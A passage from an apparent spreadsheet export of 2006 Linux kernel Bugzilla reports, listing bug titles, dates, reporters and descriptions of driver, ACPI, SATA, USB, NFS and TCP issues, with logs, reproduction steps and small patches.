    <t>David Binderman &lt;dcb314@hotmail.com&gt; reported the following bug: I just tried to compile the Linux Kernel version 2.6.11.12 with the most excellent Intel C compiler. It said drivers/scsi/pcmcia/aha152x_stub.c(313): remark #592: variable "tmp" is used before its value is set tmp.device-&gt;host = info-&gt;host; ^ This is clearly broken code, since the field tmp.device has not been initialised, and so isn't pointing to anything.</t>
  </si>
  <si>
    <t>EGA problem since 2.6.14</t>
  </si>
  <si>
    <t>2006-02-19 13:49 UTC</t>
  </si>
  <si>
    <t>Rafal Olearski</t>
  </si>
  <si>
    <t>2006-03-27 21:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.13.5 Distribution:Slackware Hardware Environment:Enhanced Graphics Adapter Problem Description: Function vgacon_doresize added to file drivers/video/console/vgacon.c makes mess on my EGA when called during initialization. Yes, I still posess some oryginal EGAs :) I have tested this problem on following cards: Genoa PEGA (GN00600) A.D.1987 Paradise 38315B A.D.1986 Victor Technologies GEGA 350 v2.4 A.D.1988 Best regards, Rafal</t>
  </si>
  <si>
    <t>Acpi defunct -- buttons, battery</t>
  </si>
  <si>
    <t>2006-02-20 12:58 UTC</t>
  </si>
  <si>
    <t>2006-06-25 21:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12? Distribution: FC5 test2 Hardware Environment: asus m6r laptop Software Environment: asus acpi specifics enabled in kernel Problem Description: Acpi says no matter what is enabled/disabled from ec_intr and noapic: ACPI: write EC, IB not empty ACPI: write EC, IB not empty ACPI: write EC, IB not empty ACPI Exception (evregion-0409): AE_TIME, Returned by Handler for [EmbeddedControl] [20060127] ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.RDC3] (Node ddf13fa8), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\ECIO] (Node ddf13628), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.ACPS] (Node ddf11228), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\ACPS] (Node ddf0b368), AE_TIME ACPI Error (psparse-0517): Method parse/execution failed [\_SB_.PCI0.AC0_._PSR] (Node ddf10228), AE_TIME acpi_ac-0095 [10] ac_get_state : Error reading AC Adapter state Steps to reproduce: simply boot Problems were solved by using ec_burst and patch from bug 4980 before -rc2.</t>
  </si>
  <si>
    <t>MPSC driver data misaligned on send and receive</t>
  </si>
  <si>
    <t>&gt; 2.6.11</t>
  </si>
  <si>
    <t>2006-02-20 13:24 UTC</t>
  </si>
  <si>
    <t>Brent Cook</t>
  </si>
  <si>
    <t>2006-02-21 12:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.10 or 11 Distribution: custom (buildroot) Hardware Environment: Artesyn PMPPC evaluation board (1Ghz PPC, Marvell Discovery III chipset) Software Environment: GCC 4.0.2, uClibc 0.9.28 Problem Description: TX and RX data through MPSC driver appears missaligned, byteswapped or some other foo. For instance, sending serial bytes 00, 01, 02, 03, 04, 05, 06, 07, 08, 09 from MPSC serial port is received on the other end as C0, C1, C1, C1, C2, C3, C3, C3, C4, C5. Steps to reproduce: Send and receive serial data using MPSC driver using a kernel &gt; 2.6.11</t>
  </si>
  <si>
    <t>Initio sbp2 causes: "slab error in cache_free_debugcheck(): cache `size-512(DMA)': double free, or memory outside"  object was overwritten</t>
  </si>
  <si>
    <t>2006-02-21 03:58 UTC</t>
  </si>
  <si>
    <t>2006-02-27 07:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: needs more testing, maybe 2.6.14 but could not Oldest kernel where this bug occurs: Three different machines (maybe more): One i386 with CONFIG_IEEE1394_VERBOSEDEBUG: 2.6.15 and all of 2.6.16-rc[1234] Two x86_64 without CONFIG_IEEE1394_VERBOSEDEBUG off: all of 2.6.16-rc[1234] Distribution: SuSE 10.1-beta4 Hardware Environment: i386 and x86_64 Software Environment: gcc version 4.1.0 20060210 (prerelease) (SUSE Linux) GNU assembler version 2.16.91.0.5 Problem Description: partition scan from sbp2 with slab debugging leads to double free message example dmesg ouptput (excerpt) - differs strongly: ACPI: PCI Interrupt 0000:06:09.1[B] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 ohci1394: fw-host0: OHCI-1394 1.0 (PCI): IRQ=[10] MMIO=[b8003000-b80037ff] Max Packet=[2048] IR/IT contexts=[4/4] ... SCSI subsystem initialized ieee1394: sbp2: Driver forced to serialize I/O (serialize_io=1) ieee1394: sbp2: Try serialize_io=0 for better performance spurious 8259A interrupt: IRQ7. ieee1394: Node added: ID:BUS[0-00:1023] GUID[0010100500000000] ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 scsi0 : SBP-2 IEEE-1394 ieee1394: sbp2: Node 0-00:1023: Using 36byte inquiry workaround ieee1394: sbp2: Logged into SBP-2 device ieee1394: Node 0-00:1023: Max speed [S400] - Max payload [2048] Vendor: Initio Model: 6L200P0 Rev: 2.35 Type: Direct-Access ANSI SCSI revision: 00 SCSI device sda: 398297088 512-byte hdwr sectors (203928 MB) sda: Write Protect is off sda: Mode Sense: 86 0b 00 02 sda: got wrong page sda: assuming drive cache: write through slab error in cache_free_debugcheck(): cache `size-512(DMA)': double free, or memory outside object was overwritten [&lt;c014c1a6&gt;] cache_free_debugcheck+0xbf/0x192 [&lt;e10d3818&gt;] sd_revalidate_disk+0xbab/0xc97 [sd_mod] [&lt;c014c623&gt;] kfree+0x3c/0x6c [&lt;e10d3818&gt;] sd_revalidate_disk+0xbab/0xc97 [sd_mod] [&lt;c01aaeb6&gt;] idr_get_new_above_int+0x10c/0x1cf [&lt;e10d3b87&gt;] sd_probe+0x283/0x31e [sd_mod] [&lt;c01832dc&gt;] sysfs_new_dirent+0x19/0x58 [&lt;c020aed6&gt;] __device_attach+0x0/0x5 [&lt;c020ae8d&gt;] driver_probe_device+0x42/0x8b [&lt;c020a8b5&gt;] bus_for_each_drv+0x39/0x60 [&lt;c020af30&gt;] device_attach+0x55/0x65 [&lt;c020aed6&gt;] __device_attach+0x0/0x5 [&lt;c020a7d3&gt;] bus_add_device+0x27/0xd0 [&lt;c0209d8e&gt;] device_add+0xd0/0x12e [&lt;e112fb99&gt;] scsi_sysfs_add_sdev+0x2a/0x1e0 [scsi_mod] [&lt;e112e5e1&gt;] scsi_probe_and_add_lun+0x62c/0x806 [scsi_mod] [&lt;e112e6da&gt;] scsi_probe_and_add_lun+0x725/0x806 [scsi_mod] [&lt;c0209de5&gt;] device_add+0x127/0x12e [&lt;e112f251&gt;] __scsi_add_device+0x54/0x81 [scsi_mod] [&lt;e10cc0d3&gt;] sbp2_max_speed_and_size+0xaf/0xb7 [sbp2] [&lt;e112f289&gt;] scsi_add_device+0xb/0x1c [scsi_mod] [&lt;e10cd3d6&gt;] sbp2_probe+0x3da/0x430 [sbp2] [&lt;c020aed6&gt;] __device_attach+0x0/0x5 [&lt;c020ae8d&gt;] driver_probe_device+0x42/0x8b [&lt;c020a8b5&gt;] bus_for_each_drv+0x39/0x60 [&lt;c020af30&gt;] device_attach+0x55/0x65 [&lt;c020aed6&gt;] __device_attach+0x0/0x5 [&lt;c020a7d3&gt;] bus_add_device+0x27/0xd0 [&lt;c0209d8e&gt;] device_add+0xd0/0x12e [&lt;e0e52f27&gt;] nodemgr_register_device+0x78/0x12b [ieee1394] [&lt;c013d853&gt;] kzalloc+0x11/0x3a [&lt;e0e533af&gt;] nodemgr_process_unit_directory+0x32b/0x340 [ieee1394] [&lt;e0e536df&gt;] nodemgr_probe_ne+0x168/0x3e0 [ieee1394] [&lt;e0e5410b&gt;] nodemgr_host_thread+0x7b4/0x906 [ieee1394] [&lt;e0e53957&gt;] nodemgr_host_thread+0x0/0x906 [ieee1394] [&lt;c0101005&gt;] kernel_thread_helper+0x5/0xb c009ec80: redzone 1: 0x170fc2a5, redzone 2: 0x0. SCSI device sda: 398297088 512-byte hdwr sectors (203928 MB) sda: Write Protect is off sda: Mode Sense: 86 0b 00 02 sda: got wrong page sda: assuming drive cache: write through slab error in cache_free_debugcheck(): cache `size-512(DMA)': double free, or memory outside object was overwritten [&lt;c014c1a6&gt;] cache_free_debugcheck+0xbf/0x192 [&lt;e10d3818&gt;] sd_revalidate_disk+0xbab/0xc97 [sd_mod] [&lt;c014c623&gt;] kfree+0x3c/0x6c [&lt;e10d3818&gt;] sd_revalidate_disk+0xbab/0xc97 [sd_mod] [&lt;c0164197&gt;] ifind+0x5b/0x8b [&lt;c017eac5&gt;] rescan_partitions+0x69/0x195 .... backtraces vary sometimes a bit, mat not even be caused by spb2 but SCSI, ... Steps to reproduce: 1) Compile and install kernel with CONFIG_DEBUG_SLAB=y 2) have a Initio SBP2 disk conneced with having loaded/loading sbp2 and sd_mod, or plug in SBP2 disk while these drivers are loaded, both work relabily</t>
  </si>
  <si>
    <t>mount of UDF fs ignores UID and GID options</t>
  </si>
  <si>
    <t>2006-02-23 13:23 UTC</t>
  </si>
  <si>
    <t>2007-09-18 11:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Kanotix (debian SID, 32bit) Hardware Environment: Desktop PC, AMD 64, as well as on Laptop, i586 Software Environment: Debian SID, 32bit Problem Description: Mounting a UDF formatted DVD results in all files belonging to root, irrespectable of UID and GID options at mount. UMASK applies correctly, on the other hand. Steps to reproduce: Burn DVD with UDF format (e.g. via k3b), no iso9660 file structure. Mount via "mount /dev/&lt;your DVDdrive&gt; /media/&lt;your DVDdrive&gt; -t udf -o nodev,nosuid,noexec,UID=1000,GID=1000,UMASK=007". Mounted files are all owned bei root:root. No access for user 1000 possible. I guess, this is not the correct behaviour, as otherwise the GID/UID options should not exist for UDF at all. ISO9660 format works correctly. Michael</t>
  </si>
  <si>
    <t>NFS updates file modification time on close() or after last write, breaks "cp -p",  "cp -a" and "cp --preserve=timestamps"</t>
  </si>
  <si>
    <t>2006-02-24 08:40 UTC</t>
  </si>
  <si>
    <t>2006-03-26 11:21 UTC</t>
  </si>
  <si>
    <t>Problem with kernel 2.6.15 and EHCI-HCD</t>
  </si>
  <si>
    <t>2.6.15.x</t>
  </si>
  <si>
    <t>2006-02-24 09:35 UTC</t>
  </si>
  <si>
    <t>2006-02-28 14:25 UTC</t>
  </si>
  <si>
    <t>Hello, I have a problem with the last stable version of linux (2.6.15.x) : it hangs at boot while loading ehci_hcd. The cursor is always blinking, but everything is stopped. There was no problem with the kernel 2.6.14 and previous versions. Here are the two last lines that appear on the screen : ehci_hcd 0000:00:1d.7: EHCI Host Controller ehci_hcd 0000:00:1d.7: debug port 1 Of course, I use vanilla sources with no patch. My motherboard is a MSI 865PE Neo2-P, with an Intel 865PE chipset. I have the newest BIOS. There is something strange because I have exactly the same problem with FreeBSD 6 which also hangs while loading ehci... It seems that I'm not the only one who have this problem : http://lkml.org/lkml/2006/1/4/170 But it hasn't been resolved. I also tried with the 2.6.16-rc4 kernel and it's worse, it hangs before (I don't remember where exactly). Thanks. Fred (sorry for my english)</t>
  </si>
  <si>
    <t>Duncan</t>
  </si>
  <si>
    <t>2.6.16-rc5</t>
  </si>
  <si>
    <t>Maxim Britov</t>
  </si>
  <si>
    <t>kernel.suid_dumpable sysctl is really fs.suid_dumpable</t>
  </si>
  <si>
    <t>2.6.14, 2.6.16-rc5</t>
  </si>
  <si>
    <t>2006-03-01 08:45 UTC</t>
  </si>
  <si>
    <t>2006-08-28 06:40 UTC</t>
  </si>
  <si>
    <t>The sysctl option to enable core dumps for suid processes is described in Documentation/sysctl/kernel.txt as kernel.suid_dumpable; however, it does not work: $ /sbin/sysctl kernel.suid_dumpable error: "kernel.suid_dumpable" is an unknown key $ cat /proc/sys/kernel/suid_dumpable cat: /proc/sys/kernel/suid_dumpable: No such file or directory Source inspection has shown that the option was really placed under "fs": $ /sbin/sysctl fs.suid_dumpable fs.suid_dumpable = 0 $ cat /proc/sys/fs/suid_dumpable 0 However, both the documentation and include/linux/sysctl.h imply that the option was intented to be placed under "kernel" (the numeric ID is named KERN_SETUID_DUMPABLE). How this should be fixed? Should the sysctl option be moved from "fs" to "kernel" (to agree with the documentation), or should the documentation and numeric ID be changed to match the current implementation?</t>
  </si>
  <si>
    <t>Add CIFS component</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t>2006-03-02 04:25 UTC</t>
  </si>
  <si>
    <t>2006-08-02 09:10 UTC</t>
  </si>
  <si>
    <t>It seems bugzilla has not a CIFS component, bug #6147 was submitted today with no component specified. It'd be nice to have a cifs component (also there's a cifs mailing list at linux-cifs-client@lists.samba.org)</t>
  </si>
  <si>
    <t>The ASLTS test b129 falls into an infinitive loop in a 32-bit slack mode</t>
  </si>
  <si>
    <t>2006-03-02 07:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: The Linux kernel ACPI interpreter fails the following AML test when it is compiled into a simulator. So if an OEM BIOS includes this code, Linux would fail. Steps to reproduce: Run interpreter with the attached b129.aml AML code test of ASLTS.</t>
  </si>
  <si>
    <t>syed azam</t>
  </si>
  <si>
    <t>ACPI suspend to memory fails due to my AMD/Nvidia IDE</t>
  </si>
  <si>
    <t>2006-03-03 14:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Gentoo Hardware Environment: AMD Athlon 2700+ Software Environment: GCC 4.0.2 Problem Description: When testing suspend-to-ram it would fail to resume, after using the on-board sata with an ide to sata adapter it would suceed. The only error I can get (from netconsole) is: hda: dma_timer_expiry: dma status == 0x21 hda: DMA timeout error Steps to reproduce: echo 'mem' &gt; /sys/power/state ((manually resume computer)) lockup and error message from above. Will attach all information I can.</t>
  </si>
  <si>
    <t>serial ata fails to detect gigabyte i-ram (GC Ramdisk)</t>
  </si>
  <si>
    <t>2006-03-04 09:11 UTC</t>
  </si>
  <si>
    <t>Justin Miller</t>
  </si>
  <si>
    <t>2007-06-15 19:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Unknown Distribution: gentoo Hardware Environment: Amd64 platform, Nforce3 based serial ata chipset Software Environment: Problem Description: I've installed a gigabyte i-ram device. This device emulates (in hardware) a sata hard-drive. Here is the product page: http://www.gigabyte.com.tw/Products/Storage/Default.aspx Anyway, it shows up in the BIOS as a regular hard drive. I did a little bit of debugging and found that in ata_dev_try_classify, the code: /* see if device passed diags */ if (err == 1) /* do nothing */ ; else if ((device == 0) &amp;&amp; (err == 0x81)) /* do nothing */ ; else return err; Always hits the "else" condition and returns 0 without attempting to classify the drive. I think what might have been intended was: /* see if device passed diags */ if ( ( err != 0 &amp;&amp; err != 1 ) &amp;&amp; !((device == 0) &amp;&amp; (err == 0x81)) ) return err; This will cause the function to return early if error is not 0, not 1 and if the (device == 0 &amp;&amp; err == 0x81) condition is not true. I changed the code to this new set of conditions, and it correctly detects the i-ram device now. I don't know much about kernel development, and even less about sata hardware drivers, so it's quite probable that code change I've suggested is incorrect. I'm willing to test any changes that a real kernel developer makes to address this problem. Steps to reproduce: Well, I would image this could occur with other devices, but the i-ram is the only sata drive that I own.</t>
  </si>
  <si>
    <t>sata_nv non working &gt;2.6.13</t>
  </si>
  <si>
    <t>2006-03-06 04:51 UTC</t>
  </si>
  <si>
    <t>Marek Hobler, 'neutrinus'</t>
  </si>
  <si>
    <t>2006-04-07 04:00 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.5(vanilia) Distribution: Debian_AMD64/sid Hardware Environment: CPU: Amd64 Sempron 3100+ MBO: Asus k8n4-e deluxe (nforce4) HDD: SAMSUNG HD080HJ (sata) marek@mstation:~$ lspci 0000:00:00.0 Memory controller: nVidia Corporation CK804 Memory Controller (rev a3) 0000:00:01.0 ISA bridge: nVidia Corporation CK804 ISA Bridge (rev a3) 0000:00:01.1 SMBus: nVidia Corporation CK804 SMBus (rev a2) 0000:00:02.0 USB Controller: nVidia Corporation CK804 USB Controller (rev a2) 0000:00:02.1 USB Controller: nVidia Corporation CK804 USB Controller (rev a3) 0000:00:04.0 Multimedia audio controller: nVidia Corporation CK804 AC'97 Audio Controller (rev a2) 0000:00:06.0 IDE interface: nVidia Corporation CK804 IDE (rev f2) 0000:00:07.0 IDE interface: nVidia Corporation CK804 Serial ATA Controller (rev f3) 0000:00:08.0 IDE interface: nVidia Corporation CK804 Serial ATA Controller (rev f3) 0000:00:09.0 PCI bridge: nVidia Corporation CK804 PCI Bridge (rev a2) 0000:00:0a.0 Bridge: nVidia Corporation CK804 Ethernet Controller (rev a3) 0000:00:0b.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 0000:00:0c.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 0000:00:0d.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 0000:00:0e.0 PCI bridge: nVidia Corporation CK804 PCIE Bridge (rev a3) 0000:00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 0000:00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 0000:00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 0000:00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 0000:01:00.0 VGA compatible controller: nVidia Corporation GeForce 6200 TurboCache(TM) (rev a1) 0000:05:0b.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) marek@mstation:~$ Software Environment: there are my both configs(2.6.13 and 2.6.15), dumps from console,dmesg from 2.6.13 and photo 2.6.15 unbootable: http://photo.neutrinus.com/tmp/kernel/ marek@mstation:~$ gcc -v Using built-in specs. Target: x86_64-linux-gnu Configured with: ../src/configure -v --enable-languages=c,c++,java,f95,objc,ada,treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.0 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.0-1.4.2.0/jre --enable-mpfr --disable-werror --enable-checking=release x86_64-linux-gnu Thread model: posix gcc version 4.0.3 20060304 (prerelease) (Debian 4.0.2-10) marek@mstation:~$ Problem Description: kernel &gt; 2.6.13.5 doesn't detect my nvidia_nv controler - the system couldynt boot from sata disk. Steps to reproduce: compile kernel, install kernel and reboot. :)</t>
  </si>
  <si>
    <t>2.6.15.6</t>
  </si>
  <si>
    <t>Unplug of USB sound card while in use causes oops</t>
  </si>
  <si>
    <t>2.6.16-rc5-git</t>
  </si>
  <si>
    <t>2006-03-07 11:49 UTC</t>
  </si>
  <si>
    <t>2006-05-19 03:05 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: i386 Steps to reproduce: Plug in usb sound card. root@amd:/home/pavel# cat /proc/asound/cards 0 [I82801DBICH4 ]: ICH4 - Intel 82801DB-ICH4 Intel 82801DB-ICH4 with AD1981B at 0xc0000c00, irq 5 1 [U0x4fa0x4201 ]: USB-Audio - USB Device 0x4fa:0x4201 USB Device 0x4fa:0x4201 at usb-0000:00:1d.1-1, full speed root@amd:/home/pavel# ...launch something to play on the soundcard. mpg123 -D /dev/dsp1 does that fine. (I don't hear anything from the speaker, but I guess that's separate problem). root@amd:/home/pavel# cat /proc/asound/card1/stream0 USB Device 0x4fa:0x4201 at usb-0000:00:1d.1-1, full speed : USB Audio Playback: Status: Running Interface = 1 Altset = 4 URBs = 8 [ 4 4 4 4 4 4 4 4 ] Packet Size = 49 Momentary freq = 48004 Hz (0x30.0100) Interface 1 Altset 1 Format: S16_LE Channels: 2 Endpoint: 1 OUT (ASYNC) Rates: 44100, 48000 Interface 1 Altset 2 Format: S16_LE Channels: 1 Endpoint: 1 OUT (ASYNC) Rates: 44100, 48000 Interface 1 Altset 3 Format: S8 Channels: 2 Endpoint: 1 OUT (ASYNC) Rates: 44100, 48000 Interface 1 Altset 4 Format: S8 Channels: 1 Endpoint: 1 OUT (ASYNC) Rates: 44100, 48000 Interface 1 Altset 5 Format: S16_LE Channels: 2 Endpoint: 1 OUT (ADAPTIVE) Rates: 44100, 48000 root@amd:/home/pavel# Now unplug USB without stopping sound...</t>
  </si>
  <si>
    <t>2.6.16-git</t>
  </si>
  <si>
    <t>[CHECKER] arch/i386/kernel/io_apic.c: error return from find_isa_irq_apic ignored</t>
  </si>
  <si>
    <t>2006-03-07 21:34 UTC</t>
  </si>
  <si>
    <t>2006-12-23 14:29 UTC</t>
  </si>
  <si>
    <t>Chuck Ebbert</t>
  </si>
  <si>
    <t>In check_timer, the possibility that find_isa_irq_apic can return -1 is not accounted for, and its value is passed unchecked to clear_IO_APIC_pin.</t>
  </si>
  <si>
    <t>with uhci_hcd loaded S3 resume immediately</t>
  </si>
  <si>
    <t>2006-03-08 07:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: ? Distribution: Debian Hardware Environment: A7V8X motherboard (VT8235 PCI Bridge, VT82xxxxx UHCI USB 1.1 Controller) Software Environment: Vanilla 2.6.15.4 kernel Problem Description: When I put the system in suspend-to-ram echo mem &gt; /sys/power/state all seems well, but the system resumes immediately (but normally). After this the system seems prefectly stable. If I try the same after unloading the driver, suspend-to-ram works as expected. Steps to reproduce: modprobe uhci_hcd echo mem &gt; /sys/power/state</t>
  </si>
  <si>
    <t>unregister_netdevice: waiting for ppp9 to become free. Usage count = 658</t>
  </si>
  <si>
    <t>2.6.15 and all 2.6 series</t>
  </si>
  <si>
    <t>2006-03-09 01:24 UTC</t>
  </si>
  <si>
    <t>Zabavschi Vlad</t>
  </si>
  <si>
    <t>2008-03-18 08:32 UTC</t>
  </si>
  <si>
    <t>Hi there! I've been experienced a big problem with the lastest kernel version and all 2.6 versions prior to this version. I'm using Fedora Core 3 and the machine in cause is a router and a dialin server. I use pppoe-server in kernel mode (rp-pppoe-3.7 and pppd 2.4.3). When a user connects to server with pppoe, then to the http daemon and then disconnects the kernel start saying messages like this kind: Message from syslogd@nextc at Thu Mar 9 10:51:14 2006 ... nextc kernel: unregister_netdevice: waiting for ppp9 to become free. Usage count = 233 NOW this blocks any connection attempt to the pppoe-server for at least 10 min!!! I cannot even do a simple "ip addr list" cause my shell will hang! I've made this path: --- include/net/tcp.h.original 2006-03-06 05:22:38.000000000 +0200 +++ include/net/tcp.h 2006-03-06 05:24:58.000000000 +0200 @@ -100,7 +100,7 @@ */ -#define TCP_TIMEWAIT_LEN (60*HZ) /* how long to wait to destroy TIME-WAIT +#define TCP_TIMEWAIT_LEN (2*HZ) /* how long to wait to destroy TIME-WAIT * state, about 60 seconds */ #define TCP_FIN_TIMEOUT TCP_TIMEWAIT_LEN /* BSD style FIN_WAIT2 deadlock breaker. after some googling on the net, and now the tcp conection dissapears very fast but the problem still remains... Best regards, Zabavschi Vlad</t>
  </si>
  <si>
    <t>Linux 2.4.32 keeps hanging</t>
  </si>
  <si>
    <t>2006-03-09 08:08 UTC</t>
  </si>
  <si>
    <t>jas</t>
  </si>
  <si>
    <t>2008-03-19 01:45 UTC</t>
  </si>
  <si>
    <t>We are running Linux Kernel 2.4.32 and have been experiencing hangs every 1-4 days. Sometimes, we can get multiple hangs in a single day. We cannot determine the precise steps to reproduce the hang, but we have replaced the server three times, and each time the problem continues to reoccur. The first server had Intel server board SE7501WV2A. The second system was a Dell Precision WorkStation 450 (Intel 7505 chipset). The last system was a Dell PowerEdge 1750 box (Intel ServerWorks GC LE chipset). All systems have Dual Xeon, 4 gb memory. The first two systems were using on-board Intel e1000, which I was suspicious was the cause of the problem, but the last system was running dual Broadcom gigabit and using the tg3 driver, so this was not an issue. The users logging into the server are accessing their home directories from our NFS server. When the server hangs, the monitor on the console screen goes black, yet the machine remains pingable. An nmap on the machine reveals the ports that it provides services on. The machine will answer on those ports, but the services are not available. We also have the contents of a "ps" that is going to a file once every minute, in order to try to help us solve this problem, and that activity stops. Activity prior to the crash is generally minimal. A serial console displays nothing until the machine is rebooted. We recently installed the sgi kdb patch in the hopes that we might be able to provide more details in order to solve this problem. Yesterday, the system crashed again. We were able to get into kdb and record the following information: 1) a ps listing of all running processes 2) sysrq memory data 2) a backtrace on each running process 3) a single step trace on each of the processors I have included this data in the attached file. We are extremely anxious to solve this problem. If anyone has any idea, please let us know.</t>
  </si>
  <si>
    <t>_syscallX() macros do not compile in PIC mode</t>
  </si>
  <si>
    <t>2006-03-09 14:57 UTC</t>
  </si>
  <si>
    <t>Markus Gutschke</t>
  </si>
  <si>
    <t>2006-03-23 19:31 UTC</t>
  </si>
  <si>
    <t>nforce3 agp does not initialized properly after resume</t>
  </si>
  <si>
    <t>2006-03-10 00:57 UTC</t>
  </si>
  <si>
    <t>Serge Belyshev</t>
  </si>
  <si>
    <t>2006-08-01 06:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: any Hardware Environment: amd64 laptop nforce3 chipset ati radeon m9 videocard Software Environment: N/A Problem Description: after resume from acpi S3 suspend-to-ram text console works but system hangs when starting X (or switching to virtual console where X is running). No useful messages was captured via network console. I was able to produce workaround for this bug, here it is (this patch is for 2.6.16-rc5 kernel): drivers/char/agp/amd64-agp.c | 1 + 1 file changed, 1 insertion(+) Index: linux/drivers/char/agp/amd64-agp.c =================================================================== --- linux.orig/drivers/char/agp/amd64-agp.c +++ linux/drivers/char/agp/amd64-agp.c @@ -615,6 +615,7 @@ static int agp_amd64_resume(struct pci_d pci_set_power_state(pdev, PCI_D0); pci_restore_state(pdev); + nforce3_agp_init(pdev); return amd_8151_configure(); } with this patch, everything works just fine. Steps to reproduce: (1). compile 2.6.16-rc5 kernel, applying hack mentioned here: http://bugzilla.kernel.org/show_bug.cgi?id=5866#c1 to make hdd work after resume. (2). suspend system, saving video state with vbetool version 0.4 or later (previous versions of vbetool did not work on amd64) http://www.srcf.ucam.org/~mjg59/vbetool/ as prescribed in Documentation/power/video.txt (3). after resume, start X. use power switch to shut down hung system =). Note: this failure can be reproduced with earlier kernels, 2.6.15 and 2.6.14 (not tried 2.6.13) but the workaround for this is slightly different. (at resume, you need to call also amd_8151_configure() in amd64-agp.c and ati_configure() in ati-agp.c).</t>
  </si>
  <si>
    <t>Martin Schwidefsky</t>
  </si>
  <si>
    <t>Link in help for CONFIG_IP_MULTICAST out of date</t>
  </si>
  <si>
    <t>2006-03-11 13:51 UTC</t>
  </si>
  <si>
    <t>james</t>
  </si>
  <si>
    <t>2007-02-20 06:49 UTC</t>
  </si>
  <si>
    <t>The link for http://www-itg.lbl.gov/mbone/ no longer works. Please update it with http://www.savetz.com/mbone/ Thanks!</t>
  </si>
  <si>
    <t>The init process gets stuck in "D" state during boot.</t>
  </si>
  <si>
    <t>8fce4d8e3b9e3cf47cc8afeb6077e22ab795d989</t>
  </si>
  <si>
    <t>2006-03-15 03:59 UTC</t>
  </si>
  <si>
    <t>Alex Outhred</t>
  </si>
  <si>
    <t>2006-03-23 15:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 0d514f040ac6629311974889d5b96bcf21c6461a Note - I have one patch on top of Linus' git tree, which hopefully is unrelated to this bug report. It lets CPU frequency scaling continue to function on my machine (despite an errata on this CPU): &gt;diff-tree 378f1d5... (from 53ea68e...) &gt;Author: Alex &lt;alex@nautical.ath.cx&gt; &gt;Date: Sun Feb 5 13:45:21 2006 +1100 &gt; &gt; Revert "[CPUFREQ] p4-clockmod: Workaround for CPU's with N60 errata" &gt; &gt; This reverts c70ca00f77eb1bb69c5a2d029b3a911bc88eac1b commit. Distribution: Fedora development (rawhide) - recently synced Hardware Environment: pentium 4 Software Environment: /boot on ext3 on SCSI Root on reiserfs on lvm on md1 on SCSI gcc version 4.1.0 20060304 (Red Hat 4.1.0-3) Problem Description: The init process gets stuck in "D" state during boot, after md aurorun, and just after reiserfs says: dm-0: checking transaction log (dm-0) Boot does not proceed any further. Magic SysRq produces a call trace, which I'll attach. I'm hoping someone can tell what the problem is just by looking at my dmesg and the call trace for init, because I don't have time to do a git-bisect at the moment. I did wonder if commit 04b857f had uncovered a bug somewhere else - maybe in reiserfs, lvm or cfq? But I'm just guessing, because that commit touches md-raid1 and I use raid1. Steps to reproduce: 100% reproducible on my machine. Persists with more recent git trees - most recent I've tried is 3759fa9c55923f719ae944a3f8fbb029b36f759d. I thought it might be a mkinitrd bug, so I substituted a known working initramfs "initrd", but init still got stuck in "D" state.</t>
  </si>
  <si>
    <t>race condition in tcp_sendmsg when connection became established</t>
  </si>
  <si>
    <t>2006-03-16 07:22 UTC</t>
  </si>
  <si>
    <t>2006-03-17 18:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: all versions have this problem, probably Distribution: Hardware Environment: 2 hosts connected via network Software Environment: Problem Description: There is a race condition in tcp_sendmsg() function. It checks that connection is not established yet and calls sk_stream_wait_connect() in this case. sk_stream_wait_connect() checks TCP state again, and this state may be changed from the previous check (connection have just established). In this situation, send() syscall seturns -1 with EPIPE instead of sending data. Next calls to send() will work without problems. Steps to reproduce: 1. On the host2, set up iptables to drop all TCP packets from the host1. Set up a TCP server listening on some_port. 2. On the host1, call non-blocking connect() on a TCP socket to host2:some_port. 3. On the host1, call send() on this socket. Notice that the socket is not connected yet. 4. Simultaneously with step 3, remove the firewall on the host2 to move the connection to ESTABLISHED state. 5. Expect send() to return success when the connection become established. In most cases, it is so. Sometimes, I get -1 with EPIPE. I've added a printk() into sk_stream_wait_connect() just after if ((1 &lt;&lt; sk-&gt;sk_state) &amp; ~(TCPF_SYN_SENT | 